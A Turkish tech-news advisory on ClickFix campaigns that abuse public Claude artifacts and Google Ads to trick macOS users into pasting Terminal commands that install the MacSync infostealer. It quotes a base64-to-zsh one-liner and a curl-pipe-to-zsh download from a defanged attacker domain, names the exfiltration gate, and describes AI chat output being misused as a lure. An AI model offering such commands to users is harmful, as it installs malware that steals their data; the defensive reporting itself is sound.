Siber Güvenlik

Kritik Uyarı: Claude LLM Kötüye Kullanılıyor, Mac Bilgileri Çalınıyor!

teknomers
teknomers

Giriş

Kötü niyetli aktörler, Claude ve Google Ads’i kullanarak macOS kullanıcılarına yönelik infostealer kötü amaçlı yazılım dağıtan ClickFix kampanyaları düzenliyor. Bu saldırılar, belirli aramalara yanıt olarak tehlikeli içeriklerin sunulmasıyla gerçekleşiyor ve ciddi bir güvenlik tehdidi oluşturuyor.

Contents

Saldırı Nasıl Çalışıyor?

Araştırmalara göre, saldırının en az iki varyasyonu gözlemlenmiştir. Kullanıcılara yönelik kötü amaçlı arama sonuçları, aşağıdaki gibi sorgular üzerinden gerçekleştirilmektedir:

  • “online DNS resolver”
  • “macOS CLI disk space analyzer”
  • “HomeBrew”

Bu arama sonuçları, ya kamuya açık bir Claude artifact’ine veya sahte Apple Destek makalesine yönlendirmektedir. Her iki durumda da kullanıcıdan Terminal’e bir shell komutu yapıştırması istenmektedir.

İlk saldırı varyasyonunda verilen komut:
‘echo "..." | base64 -D | zsh,’

İkinci varyasyonda ise verilen komut:
‘true && cur""l -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh’

Bu komutların çalıştırılması, kullanıcıların sistemlerine kötü amaçlı bir yazılım olan MacSync infostealer’ı yüklemektedir.

Etkilenen Sistemler

CVE kodları arası bağlantılar ile etkilenen sistemlerin özellikleri:

  • Kötü amaçlı yazılım, sistemde bulunan hassas bilgileri toplamak için kullanıcıdan yetki alır.
  • MacSync infostealer, kullanıcı verilerini topladıktan sonra bu bilgileri a2abotnet[.]com/gate adresine iletmektedir.

Çözüm ve Korunma

Kullanıcılara, Terminal’de tam olarak anlamadıkları komutları çalıştırmamaları yönünde güçlü bir uyarıda bulunulmaktadır.  Kaspersky  araştırmacıları, kullanıcıların sağlanan komutların güvenli olup olmadığını belirlemek için aynı konuşmada chatbot’a bunu sormalarını önermektedir.

Ayrıca, aşağıdaki önlemleri almanızı tavsiye ederiz:

  • MacOS sistemlerini güncelleyin.
  • Güvenlik yazılımlarınızı aktif ve güncel tutun.
  • Tehlikeli bulduğunuz arama sonuçlarını takip etmeyin.
  • Bilgisayarınıza gelen şüpheli bağlantılara tıklamayın.

Sonuç olarak, kullanıcıların dikkatli olması ve güvenlik önlemlerini artırarak siber saldırılardan korunmaları hayati önem taşımaktadır.

Apple Mac Mini’nin Başlangıç Fiyatını Yükseltti
WhatsApp, Kullanıcıların İnternet Sansürünü Aşmasına Yardımcı Olmak İçin Proxy Desteği Sunuyor
Kritik Uyarı: TeamPCP, Kubernetes Saldırılarında İran Hedefli Wiper Dağıttı
Nvidia GeForce Now sonunda en çok aranan özelliklerinden birini PC ve Mac oyuncularına getiriyor
Black Hat Europe 2023 Londra’daki Rekor Kıran Etkinlikle Kapandı
ETİKETLENDİ:
Bu Makaleyi Paylaş
Önceki Makale Fintech Devlerinden Figure’dan Veri İhlali Açıklaması
Sonraki Makale ABD ile Tayvan arasındaki ticaret anlaşması: Gümrük %15’e düştü

Sanal Medya

Son Eklenenler

2026’nın En İyi 2 Bluetooth Takip Cihazı ve Öne Çıkanlar
Genel
G.Skill, AMD EXPO ULL ile performans artışını nasıl sağlıyor?
Donanım
Yaz aylarında oyun dünyasının merkezi PC olmaya devam ediyor
Oyun
Dijital Sirk Büyüleyici: YouTube Fenomeni Sinemaya Geliyor
Liste
Tifa Street Fighter 6’nın Dördüncü Sezonuna Katılıyor
Oyun
Antivaksin Tanışma Uygulamaları Gerçek Hayata Taşınıyor: Tepkiler Artıyor!
Genel